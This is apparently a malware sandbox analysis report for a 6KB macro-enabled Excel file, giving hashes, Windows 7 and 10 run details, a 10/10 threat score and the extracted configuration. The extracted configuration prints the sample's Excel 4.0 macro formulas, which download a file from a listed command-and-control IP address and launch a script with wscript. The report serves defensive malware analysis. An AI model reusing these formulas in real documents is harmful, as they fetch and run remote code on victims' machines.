6844481b70bf368ae2f7e274a86529df | Triage

Submit
Reports

Overview

overview

Static

static

6844481b70...f.xlsm

windows7-x64

6844481b70...f.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

6844481b70bf368ae2f7e274a86529df.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

6844481b70bf368ae2f7e274a86529df.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

6 signatures

150 seconds

General

Target

6844481b70bf368ae2f7e274a86529df
Size

6KB
MD5

6844481b70bf368ae2f7e274a86529df
SHA1

468c1c55012453aa5009203da9b3ec1fdefa0434
SHA256

4d241dffcd3593e2aa9b50a0d776a15da340d0dd00716a9cc5cd714879698184
SHA512

f3f12b71f757e7cb3babc3afb25968e6851d896d7e5f977f1bc689120c4ccde8939067f1c4ec8080c7a4bc853d4156b3d8c9c5b726e1b53b118362007cec8b67
SSDEEP

192:NDSTuStbrA2OmmfR88UhHFBFYuqb98yJJ+W:NIuSM2wa1FYfb98yJL

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

6844481b70bf368ae2f7e274a86529df
.xlsm office2007

© 2018-2025

Terms | Privacy